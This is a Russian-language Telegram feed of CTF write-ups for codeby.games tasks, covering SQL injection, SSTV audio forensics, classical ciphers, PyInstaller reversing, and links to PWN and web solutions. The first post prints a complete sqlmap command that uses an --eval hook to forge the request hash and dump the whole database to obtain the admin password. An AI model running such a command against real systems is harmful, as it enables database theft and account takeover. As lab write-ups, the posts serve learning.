Forwarded from Artyom
Игровой автомат
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
Зная это, дружим sqlmap с генерацией хэша через
*переменная
Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLiВ POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
result=944&hash=6bed8834f12ba1043159b2cd5f846708
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
md5(sha256(sha1(sha256(sha1(result)))))
Зная это, дружим sqlmap с генерацией хэша через
--eval и дампим БДsqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all*переменная
result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
👍5😐2❤1
#Форензика Гул земли 2 от @synberg
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
🚩 https://codeby.games
#codebygames
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👏5❤1
#Криптография от @andreika47
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
🚩 https://codeby.games
#codebygames
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
www.dcode.fr
Hill Cipher
Tool to decrypt/encrypt with Hill cipher, a ciphering system similar to affine cipher but using a coefficient matrix instead of 2 affine coefficients (gradient).
👍8❤1
Forwarded from suzu
🔥7❤1
#Реверс Лазанья от @sad_frogy
Открываем в DIE, видим PyInstaller. Находим утилиту https://pyinstxtractor-web.netlify.app, вытаскиваем из exe исходники.
Там находим файл lasagna.pyc. Его декомпилируем (https://www.toolnb.com/tools-lang-en/pyc.html), получаем исходный код.
Видим полностью алгоритм шифрования (Caesar -> base64 -> XOR -> AES), делаем в обратном порядке к переменной в этом файле. Все необходимые ключи к шифрам находятся прямо в коде.
🚩 https://codeby.games
#codebygames
Открываем в DIE, видим PyInstaller. Находим утилиту https://pyinstxtractor-web.netlify.app, вытаскиваем из exe исходники.
Там находим файл lasagna.pyc. Его декомпилируем (https://www.toolnb.com/tools-lang-en/pyc.html), получаем исходный код.
Видим полностью алгоритм шифрования (Caesar -> base64 -> XOR -> AES), делаем в обратном порядке к переменной в этом файле. Все необходимые ключи к шифрам находятся прямо в коде.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
Toolnb
PyC decompile - Toolnb online toolbox
PyC decompile, python decompile
🔥8
Мы опубликовали почти все что нам прислали!
Если у вас есть райтапы, которыми вы можете поделиться присылайте в личку @freenameruuuu и @coffeedipso
Плюс в карму вам обеспечен!
Если у вас есть райтапы, которыми вы можете поделиться присылайте в личку @freenameruuuu и @coffeedipso
Плюс в карму вам обеспечен!
❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
Medium
Solving OSINT tasks from CyberColosseum CTF
Introduction&Task Overview…
❤7
Друзья, помогите. Есть райтап на «Странный код», но я вообще не помню из какой он категории. Такое ощущение что из категории «Квесты». Кто-нибудь подскажет?
🔥6
#pwn #re #reverse #stack #ctf #writeup #codeby от @swimming_bear
Таск PWN с Киберколизея Codeby "Вход не для всех"
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-PWN-1-05-01
Таск PWN с Киберколизея Codeby "Купи слона"
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-Writeup-PWN-2-05-01
Последний легкий таск PWN с Киберколизея Codeby (название сейчас уже не помню)
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-Writeup-PWN-3-05-01
🚩 https://codeby.games
#codebygames
Таск PWN с Киберколизея Codeby "Вход не для всех"
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-PWN-1-05-01
Таск PWN с Киберколизея Codeby "Купи слона"
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-Writeup-PWN-2-05-01
Последний легкий таск PWN с Киберколизея Codeby (название сейчас уже не помню)
https://telegra.ph/Kiberkolizej-CODEBY-04-2024-Writeup-PWN-3-05-01
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Киберколизей CODEBY 04-2024. Writeup PWN #1
Полезная информации по ИБ и разборы задачек CTF. Киберколизей CODEBY 04-2024. Writeup PWN #2 Киберколизей CODEBY 04-2024. Writeup PWN #3 "Вход не для всех" При запуске у нас запрашивается сначала логин, после ввода "admin" нам предлагается ввести пароль,…
❤6
Мне немного стыдно об этом говорить, но кто решил гугл форму? Я вот нашёл в коде, что земли никогда не существовало, а дальше что?? Вот находил подобный таск, но в голове так и на смэтчилось как его решать. Кто может подсказать?
ctftime.org
CTFtime.org / n00bzCTF / Google Form 2 / Writeup
CTF writeups, Google Form 2
👍3❤2
Райтапы по CTF{2025}
Друзья! Всем доброе утро. Выкладываем ВСЕ по #WEB от @ishanyam Ссылка на райтапы, которые прекрасно организованы в статьи https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из…
Как и обещали, @ishanyam добавил следующие райтапы
Средний веб:
- Секретный ключ
Лёгкий веб:
- Ханипот
- FlagBox
- Солёный огурец
🚩 https://codeby.games
#codebygames
Средний веб:
- Секретный ключ
Лёгкий веб:
- Ханипот
- FlagBox
- Солёный огурец
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤2